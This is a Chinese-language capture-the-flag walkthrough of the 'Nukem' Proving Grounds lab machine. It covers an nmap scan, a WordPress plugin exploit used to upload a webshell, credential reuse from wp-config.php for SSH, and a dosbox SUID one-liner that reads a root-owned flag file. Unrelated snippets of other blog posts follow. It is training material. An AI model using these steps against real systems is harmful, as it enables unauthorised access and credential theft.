Nukem pg walkthrough Intermediate

news/2024/11/17 23:45:18/文章来源:https://www.cnblogs.com/wssw/p/18551418
nmap 扫描
┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.157.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-17 12:32 UTC
Nmap scan report for 192.168.157.105
Host is up (0.071s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:6a:f5:d3:30:08:7a:ec:38:28:a0:88:4d:75:da:19 (RSA)
|   256 43:3b:b5:bf:93:86:68:e9:d5:75:9c:7d:26:94:55:81 (ECDSA)
|_  256 e3:f7:1c:ae:cd:91:c1:28:a3:3a:5b:f6:3e:da:3f:58 (ED25519)
80/tcp    open  http        Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
|_http-generator: WordPress 5.5.1
|_http-title: Retro Gamming – Just another WordPress site
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.251.157' is not allowed to connect to this MariaDB server
5000/tcp  open  http        Werkzeug httpd 1.0.1 (Python 3.8.5)
|_http-title: 404 Not Found
|_http-server-header: Werkzeug/1.0.1 Python/3.8.5
13000/tcp open  http        nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Login V14
36445/tcp open  netbios-ssn Samba smbd 4.6.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=11/17%Time=6739E2AC%P=x86_64-pc-linux-gnu%
SF:r(NULL,4E,"J\0\0\x01\xffj\x04Host\x20'192\.168\.251\.157'\x20is\x20not\
SF:x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (90%), Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3.13 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 5.0 (88%), Linux 2.6.32 (87%), Linux 5.0 - 5.5 (87%), Crestron XPanel control system (86%), Linux 3.13 (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hopsTRACEROUTE (using port 3306/tcp)
HOP RTT      ADDRESS
1   70.35 ms 192.168.45.1
2   70.33 ms 192.168.45.254
3   71.17 ms 192.168.251.1
4   71.73 ms 192.168.157.105OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.12 seconds

发现wp plugin存在插件漏洞https://www.exploit-db.com/exploits/48979
成功上传webshell之后我们发现不论怎么反弹shell都弹不回来

这点卡了有点久
后来绝对应该是思路错了换个方向 我们查看wp-config.php 看到数据库的密码 和数据库用户 再看看/etc/passwd发现都有commander用户
猜测ssh commander的用户密码也是数据库密码
/** MySQL database username /
define( 'DB_USER', 'commander' );
/
* MySQL database password */
define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );

发现wget 不了 估计是ufw防火墙做设置了 用scp 上传我们的脚步pspy64 和linea
image

image
image

ssh连接成功
image

发现suid提取
dosbox 具有任意文件读取和任意文件写入
我们读取到了/etc/shadow文件 并爆破root密码爆破不出来
而且这个命令在linux上用就算创建的文件名是小写也会全部变成大写
先投机取巧一下读取个读个/root/proot.txt的flag

dosbox -c 'mount c /' -c "copy c:\root\proof.txt c:\tmp\aaDD" -c exit
cat /tmp/AADD
看了答案发现其实是可以直接调用图形化的dosbox的但是我们是ssh 连的shell没有图形化界面
要用vnc连接就好了 但是由于我们是vps连的靶机vps就是个终端本来就没有图形化界面所以接没搞了
大思路知道就好

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/835588.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Scrum冲刺-Day4

Scrum冲刺-Day4 1站立式会议 1.1站立会议照片1.2会议纪要 - Day4成员姓名 昨天已完成的工作 今天计划完成的工作 工作中遇到的困难张易欣 订单模块接口的开发 实现对用户的请求和响应进行处理 需要解决前端和后端之间的数据传递和同步问题苏清仪 分类模块接口的开发 业务逻辑处…

第七天 项目冲刺

情况 前端提出浏览器访问出现错误的问题 定位发现是跨域问题先有前端通过配置代理也能通过,但还是决定再后端也配置一下解决跨域问题由于使用了springSecurity,所有还要在security中开启这个功能 前后端沟通时发现他对我的分类的理解完全不一样,而是类似于这样的于是按照他的…

Scrum冲刺-Day3

1.站立式会议 1.1站立会议照片1.2会议纪要成员姓名 昨天已完成的工作 今天计划完成的工作 工作中遇到的困难张易欣 管理员模块接口的开发 订单模块接口的开发 暂无苏清仪 商品模块接口开发 分类模块接口的开发 暂无李心怡 登录注册 购物车功能的逻辑设计与ui图 暂无郑梦翰 确定…

Scrum冲刺-Day2

1站立式会议 1.1站立会议照片1.2会议纪要成员姓名 昨天已完成的工作 今天计划完成的工作 工作中遇到的困难张易欣 后端用户模块 管理员模块接口开发 需要更深入学习数据库知识苏清仪 项目环境搭建 商品模块接口开发 暂无李心怡 前端接口设计 登录注册 暂无郑梦翰 前端接口设计 …

Scrum冲刺-Day7

Scrum冲刺-Day7 1站立式会议 1.1站立会议照片1.2会议纪要 - Day7成员姓名 昨天已完成的工作 今天计划完成的工作 工作中遇到的困难张易欣 设计网页数据的回显及错误提示 总结七天冲刺进度 确保数据的准确性和完整性苏清仪 商品库存管理开发 商品展示顺序选择功能 处理算法的选择…

第六天 项目冲刺

任务完成情况 基本接口都写完了 评论的回复功能实现比较复杂一些,对原来的对象嵌套包装一层完成2级评论的功能 现在难题是前后端的协调调用比较麻烦,单纯的视频或者聊天以及不能满足需求 考虑到前端能及时调用后端接口比较直观,干脆部署后端项目到服务器上 申请服务器利用宝…

第五天 项目冲刺

迟迟未实现分页,今天决定实现分页功能,之前都是使用pagehelper插件来进行分页的,在mybatisplus官方文档发现它也有分页功能 于是干脆使用它的进行了分页插件的配置 学习了这种分页的使用测试显然有了分页特有的标志 基于xml的写法发现有些查询语句太多重复了,使用标签提取,…

为正在运行的 Docker 容器重启策略,以提高服务的可用性

--restart=always 是 Docker 中一个常用的参数,用来设置容器的重启策略。它的作用是确保容器在一定条件下能够自动重启,以提高服务的可用性。为正在运行的 Docker 容器重启策略,以提高服务的可用性。 为正在运行的 Docker 容器添加 --restart=always --restart=always 是 Doc…

iman——冲刺日志(第五天)

又又又一个阉割版 团队成员分工与进度 📝👥组别 成员 完成的任务 完成任务所用时间 (小时) 剩余时间 (小时)前端 阿依娜孜 尝试实现行程概览模块的前后端交互,修复页面跳转及样式排布的相关Bug。 8 8前端 郭剑敏 尝试实现备忘录与账单的前后端交互,并优化前端界面设计。 …

第三天 项目冲刺

任务 后端:对已完成的接口进行测试 前端:熟悉新的ui,继续页面开发 记录最近生病了,没有精神,只能测试了 发现了有些接口得不到想要的结果 在日志中发现原来是一些mybatisplus的用法不正确 修复bug去了 小结 黄文超:要利用好日志的功能帮助定位错误 方尔博:任重而道远啊

数据采集与融合技术实践第四次作业

这个作业属于哪个课程 <首页 - 2024数据采集与融合技术实践 - 福州大学 - 班级博客 - 博客园 (cnblogs.com)>这个作业要求在哪里 <作业4 - 作业 - 2024数据采集与融合技术实践 - 班级博客 - 博客园 (cnblogs.com)>学号 <102202101>一、作业内容 作业①要求:…

第二天 项目冲刺

今日任务 完成后端数据库的设计 以及简单的结构搭建,学习新的技术,引入springsecurity作为权限认证,以及mybatis-plus简化开发效率 实际上学习起来也不太轻松,总是遇到一些错误,以及对原理的学习还是比较费时间部分代码基本完成了各个小接口 前端选择了 这么一种风格 小结…